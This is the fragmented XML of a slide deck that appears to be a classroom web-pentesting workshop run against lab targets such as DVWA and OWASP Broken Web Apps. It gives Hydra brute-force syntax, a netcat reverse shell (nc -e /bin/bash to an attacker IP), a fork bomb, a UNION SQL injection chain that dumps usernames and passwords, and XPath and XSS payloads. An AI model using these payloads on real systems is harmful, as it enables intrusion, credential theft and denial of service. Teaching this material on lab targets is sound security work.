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 Slab"/>
      <p:regular r:id="rId42"/>
      <p:bold r:id="rId43"/>
    </p:embeddedFon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Slab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regular.fntdata"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide16.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoSlab-bold.fntdata"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide19.xml"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto-italic.fntdata"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide18.xml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053f54609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053f54609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053f54609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053f54609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053f54609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053f54609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53f54609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53f54609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053f54609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053f54609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4155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4155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241557ed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241557ed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053f54609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053f54609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241557ed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241557ed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241557ed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241557ed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241557ed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241557ed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241557ed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241557ed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241557ed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241557ed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241557ed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241557ed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241557ed1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241557ed1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241557ed1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241557ed1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41557ed1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241557ed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4276757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4276757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4276757a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4276757a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4276757a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4276757a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4276757a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4276757a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241557ed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241557ed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4276757a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4276757a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4276757a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4276757a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4276757a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4276757a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4276757a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4276757a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4276757a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4276757a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4276757a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4276757a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4276757a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4276757a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241557ed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241557ed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24155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24155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41557ed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241557ed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53f54609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53f54609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53f54609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053f54609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41556b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241556b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hidden-files.cityinthe.cloud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it.ly/2Ixtowv" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/danielmiessler/SecLists.git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192.168.56.134/bodgeit/search.jsp?q=anything" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.56.134/bodgeit/search.jsp?q=anything" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/gbrindisi/xsssniper.git" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.56.134/bodgeit/search.jsp?q=anyth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 Pentesting Basics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 Analysis cont.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Nikto (cli):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Location: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Parrot: Applications → Pentesting → Web Application Analysis → Web Vulnerability Scanners → Nikto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Kali: you’re on your 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Syntax: sudo nikto -host &lt;url or ip&gt;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Whatweb, Wappalyzer, &amp; Dirb/Dirbuster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Targets: metasploitable2,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https://hidden-files.cityinthe.cloud/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Whatweb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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>udo whatweb -v &lt;target&gt;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Wappalyzer (Free browser extension)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dirb/dirbuster (wordlists located in /usr/share/wordlists/dirb or dirbuster)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dirb (cli): dirb &lt;target ip/address&gt; ~/path/to/wordlist [options]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Whatweb, Wappalyzer, &amp; Dirb/Dirbuster cont.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Dirbuster (gui):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Parrot: Applications → Pentesting → Web Application Analysis → Web Crawlers &amp; Directory Brute Force → dirbuster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Kali: you’re on your own (again)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Areas of interest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Target URL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threads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with list of Dirs/files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extensions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Spidering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Burpsuite: spidering done automatically under target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*Make sure intercept is turned off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Site map is where all the directories will be shown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2.1: Attacking Passwords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Password/Login Attacks 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Target: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>OWASP Bricks: Login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Hydra(cli)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Intercept a packet with Burpsuite intercept or wireshark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Look for the path of the login next to the POST identifier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Syntax: hydra &lt;target ip/address&gt; http-form-post “/path/to/login:username=^USER^&amp;passwd=^PASS^&amp;submit=submit:Wrong user name or password.” -L usernames.txt (or -l for single user) -P passwords.txt (or -p for single password)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25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Password/Login Attacks cont.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BurpSuite (gui)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Proxy (BurpSuite)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Options: Check that it is running and take note of the port the proxy is running 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Make sure intercept is off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proxy: 127.0.0.1:80(or 8080, just make sure it is the same as burpsuite)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Go to Preferences → scroll to the bottom and select network settings → manual proxy configuration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Turn intercept on and navigate to the target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Enter random data for the username and password and submit login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 to BurpSuite and navigate to Proxy → Intercept and right click on the packet to send to the intruder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Password/Login Attacks cont.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in the Intruder, clear the selected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**Use the clear below the “Add” button not the one at the bottom of the app**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username input (next to the “=”), highlight it, and select add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the same for password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**Note you can import from a username/password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attack and look for the response that varies in length from the rest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600"/>
            <a:ext cx="8839199" cy="1424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98050"/>
            <a:ext cx="3519500" cy="169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297500"/>
            <a:ext cx="3519500" cy="171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5400" y="1598049"/>
            <a:ext cx="4976210" cy="3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80750" y="1100150"/>
            <a:ext cx="8222100" cy="15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0: What we will be using &amp; Terminology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7725"/>
            <a:ext cx="8839200" cy="472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Fixation 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Target: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>OWASP WebGoat: Session Management Flaws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Intercept target traffic with BurpSuite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HTTP History to find packet that was intercepted with the sessionID and right click to send to the Sequencer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on live capture to begin attack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done click on Analyze now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show the complexity/strength of the Session ID (SID)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Session Hijacking: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2.2: Command Injection Attacks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Injection Attacks Basics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common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Cross-Site Scripting (XSS)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Parts of applications that need user input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Injection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Target: Damn Vulnerable Web Application (DVWA) Command Execution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You can use metasploitable 2 or OWASPbwa, both have it included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 for attack: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Running 2 commands on the same line: touch test.txt; echo “test” &gt;&gt; test.txt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special characters with commands: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apt update &amp;&amp; apt full-upgrade (updates repositories THEN upgrades packages)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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>urpsuite &amp; (sends the Burpsuite process to the background)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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>udo !! (executes the last command with root privileges)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to other machine: netcat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machine: nc -lvp &lt;port&gt;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machine: nc.traditional -e /bin/bash &lt;your ip&gt; &lt;port&gt;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Injection cont.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Wireshark and select the interface you are using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Blind Command Injection:  &lt;ip1&gt;;ping &lt;your ip&gt;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fun: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>FORK BOMB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Syntax: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>: ( ) { : | : &amp; } ; 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2.3: SQL Injection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Basics </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="217" name="Google Shape;217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the basics, not as in depth as CSCI332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Syntax: SELECT &lt;attributes (columns)&gt; FROM &lt;table1, table2&gt; WHERE &lt;condition&gt;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 Commands: CREATE (DB or Table), SELECT, UPDATE, INSERT, DELETE, DROP, ORDER BY, UNION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SQL Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="223" name="Google Shape;223;p4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of Choice: DVWA SQL Injection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Character: (‘), should return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2’ AND ‘1’ =1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2’ ORDER BY &lt;int&gt; #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2’ UNION SELECT 1,2 #’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2’ UNION SELECT database(),user()#’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2’ UNION SELECT schema_name(),2 FROM information_schema.schemata#’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2’ UNION SELECT table_name,2 FROM information_schema.tables WHERE table_schema=’dvwa’#’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SQL Injection cont.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p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2’ UNION SELECT column_name,column_type FROM information_schema.columns WHERE table_schema=’dvwa’#’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2’ UNION SELECT CONCAT (user_id,’-’,first_name,’ ’, last_name), CONCAT(user,’:’,password) FROM dvwa.users #’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Offensive Machine (Parrot)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OWASPbwa (Broken Web App):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https://bit.ly/2Ixtowv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VirtualBox: use the OWASP Broken Web Apps-cl1.vmdk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VMWare: use the OWASP Broken Web Apps.vmx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SecLists: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https://github.com/danielmiessler/SecLists.git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Blind/Automated SQL Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="235" name="Google Shape;235;p4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 of Choice: SQLmap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Target: OWASP Multidae II → OWASP 2007 →  OWASP 2007 Improper Error Handling → User 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 random username and password and copy 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Syntax: sudo sqlmap -u “&lt;url&gt;” -p username --schema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2.4: XML Injection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Basics</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="246" name="Google Shape;246;p4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Target: OWASP bWAPP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of formating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sends XML formatted information, application reads it &amp; interprets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Burpsuite → Intercept packet → Change gener=action to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>gener=action’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Burpsuite → Intercept packet → Change gener=action to gener=act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the contains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Burpsuite → Intercept packet → Change gener=action to gener=action’)]/*|//*[contains(‘1’,‘1’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2.5: XSS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3: Profit!!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 Basics</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="262" name="Google Shape;262;p4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TL;DR: Attacker attacks vulnerable web app, victim uses web browser and is redirected to attacker’s website of choice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Reflected: temporary or vulnerability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Target: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>DVWA (XSS reflected then stored)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&lt;script&gt;alert(‘Hello’)&lt;/script&gt;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Stored: saved on the web server and will be shown to every user on the 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Target: OWASP WackoPicko (Guest Book), python server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python3 -m http.server 12345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Name: xsstest, Comment: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>&lt;script&gt;alert(‘Hello’)&lt;/script&gt;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 Automation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="268" name="Google Shape;268;p4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XSSer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Target: OWASP BodgeIT → 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Syntax: sudo xsser -u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http://192.168.56.134/bodge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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> -g search.jsp?q=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XSSsniper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Download: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https://github.com/gbrindisi/xsssniper.git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Syntax: python xsssniper.py -u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http://192.168.56.134/bodgeit/search.jsp?q=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Areas of Interest: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GET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Path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Protocol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User-Agent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Cookie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900" y="1914699"/>
            <a:ext cx="5832149" cy="1314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555600"/>
            <a:ext cx="5327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Responses (Post)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594025"/>
            <a:ext cx="2808000" cy="28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Areas of Interest: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PATH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Protocol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User-Agent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Cookie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USERNAME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PASSWORD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Response Codes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200- ok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300- redirected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400- Error on client side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500- Server-side error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900" y="1789587"/>
            <a:ext cx="5832150" cy="1564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Types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 Bomb (aka brute force)- using username and password lists to brute force login attempts to discover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Injection (Badly filtered results)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Command: Bash commands executed on another machine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SQL: Structured Query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XML:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Extensible Markup Language</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Another Type of DB)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Site Scripting (XSS)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of the most common attacks next to SQL Injection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or JavaScript code change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1: Information Gathering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 Analysis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Openvas (web interface): https://127.0.0.1:9392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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>penvas-setup/start/stop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Areas of interest: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Scans → Tasks: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Star next to wand: add a target (aka task)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Star next to scan targets: add target info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you can add multiple hosts by uploading a .txt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Scans → Reports: visual representation of vulnerabilities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Scans → Results: vulnerabilities that have been found </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>AND</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> remediation strategies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 Analysis cont.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Importing to Metasploit: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Scans → Results → Download .xml file by clicking green down arrow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Launch Metasploit (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng"/>
              <a:t>make sure postgresql is running</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>)→ db_import &lt;file that you downloaded&gt;.xml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 Commands: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hosts: all the hosts scanned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vulns: displays the vulnerabilities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